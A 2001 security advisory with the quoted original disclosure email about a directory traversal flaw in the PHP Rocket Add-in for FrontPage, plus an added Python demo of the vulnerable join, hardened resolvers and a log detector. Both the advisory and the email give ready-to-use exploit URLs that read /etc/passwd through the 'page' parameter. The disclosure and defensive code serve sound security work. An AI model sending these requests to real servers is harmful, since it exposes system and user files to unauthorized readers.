PHP Rocket Add-in for FrontPage Discloses Files on the Server to Remote Users
Date: Dec 29 2001
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Description: An information disclosure vulnerability was reported in PHP Rocket Add-in for FrontPage. A remote user can retrieve files located anywhere on the server.
It is reported that a remote user can place '../' sequences in the 'page' parameter of a GET request to read files located outside of the web root directory. The following type of URL can be used to trigger the vulnerability:
http://[targethost]/phprocketaddin/?page=../../../../etc/passwd
http://[targethost]/index.php?page=../../../../etc/passwd
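The root cause described above is an include path built directly from the 'page' query value. The following added example (not code from this entry or from the PHP Rocket add-in, whose source is not shown here) reconstructs that pattern in Python against a throwaway directory tree, places it beside two hardened forms (canonical-path confinement and a fixed allowlist), and adds a small detector for the reported request shape over constructed access-log lines. The directory layout, file names, allowlist entries and log lines are all constructed for the demonstration.

```python
"""Added example, not part of the advisory or the add-in: an unchecked
?page= join, two hardened resolvers, and a log-line detector for the
'../' request pattern the advisory reports."""
import os
import shutil
import tempfile
from urllib.parse import parse_qs, urlsplit


def make_sample_site():
    """Build a throwaway tree standing in for the web root (constructed layout)."""
    root = tempfile.mkdtemp(prefix="phprocket_demo_")
    pages = os.path.join(root, "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "home.html"), "w") as fh:
        fh.write("<h1>home</h1>")
    # Lives outside pages/: a stand-in for /etc/passwd that the demo may read.
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("not for the web")
    return root


def unchecked_resolve(pages_dir, page):
    """The pattern the advisory describes: the query value is joined onto the
    page directory with no validation, so '../' walks out of it."""
    return os.path.join(pages_dir, page)


def confined_resolve(pages_dir, page):
    """Hardened form: canonicalise, then require the result to stay under
    pages_dir. Checking the canonical path (symlinks resolved, '..' collapsed)
    avoids having to recognise any particular spelling of the traversal."""
    base = os.path.realpath(pages_dir)
    # os.path.join drops base when page is absolute; realpath+commonpath still catches it.
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"refusing path outside {base}: {page!r}")
    return target


ALLOWED_PAGES = {"home", "about"}  # constructed allowlist; the add-in's real page names are unknown


def allowlisted_resolve(pages_dir, page):
    """Strictest form: a short token selects a known file; anything else is rejected."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page {page!r}")
    return os.path.join(pages_dir, page + ".html")


def read_page(resolver, pages_dir, page):
    """Return the file content, or None when the resolver rejects the request."""
    try:
        with open(resolver(pages_dir, page)) as fh:
            return fh.read()
    except ValueError:
        return None


# Constructed CLF-style access-log lines using the request shape from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Dec/2001:10:00:00 +0000] "GET /phprocketaddin/?page=../../../../etc/passwd HTTP/1.0" 200 1234',
    '10.0.0.6 - - [29/Dec/2001:10:00:01 +0000] "GET /phprocketaddin/?page=home HTTP/1.0" 200 512',
    '10.0.0.7 - - [29/Dec/2001:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.0" 200 1234',
]


def flag_traversal_requests(log_lines):
    """Return request paths whose query values contain a '..' path segment.
    parse_qs percent-decodes values, so encoded forms of the same sequence are
    seen in decoded form; adapt the field parsing to your own log format."""
    flagged = []
    for line in log_lines:
        try:
            request = line.split('"')[1]  # the "GET /path?query HTTP/1.0" field
            _method, path, _proto = request.split(" ", 2)
        except (IndexError, ValueError):
            continue
        query = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for values in query.values():
            if any(".." in v.replace("\\", "/").split("/") for v in values):
                flagged.append(path)
                break
    return flagged


def demo():
    """Run each resolver against the same traversal input and return the outcomes."""
    root = make_sample_site()
    pages = os.path.join(root, "pages")
    try:
        return {
            "unchecked_leaks": read_page(unchecked_resolve, pages, "../secret.txt"),
            "confined_leaks": read_page(confined_resolve, pages, "../secret.txt"),
            "confined_ok": read_page(confined_resolve, pages, "home.html"),
            "confined_rejects_deep": read_page(confined_resolve, pages, "../../../../etc/passwd"),
            "allowlisted_ok": read_page(allowlisted_resolve, pages, "home"),
            "allowlisted_leaks": read_page(allowlisted_resolve, pages, "../secret"),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
    print(flag_traversal_requests(SAMPLE_LOG))
```

The allowlist is the fix to prefer when the set of pages is small and fixed, as it is for a FrontPage add-in; the confinement check is the fallback when pages are created dynamically, and it should be applied to the canonical path rather than to the raw parameter, so that it does not depend on matching a particular spelling of '../'.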
Impact: A remote user can view files located anywhere on the web server.
Solution: No solution was available at the time of this entry.
Vendor URL: www.totalpconline.com/phprocketaddin/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (NT), Windows (2000), Windows (XP)
Reported By: John Doe <zaleth@hushmail.com>
Message History:
None.
Source Message Contents
Date: 28 Dec 2001 22:39:36 -0000
From: John Doe <zaleth@hushmail.com>
Subject: PHP Rocket Add-in (file traversal vulnerability)
Hi
Just found a file traversal vulnerability in PHP
Rocket Add-in.
I won't ramble but here's what you do:
http://www.someuser.com/phprocketaddin/?page=../../../../etc/passwd
http://www.someuser.com/index.php?page=../../../../etc/passwd
Cheers
Zaleth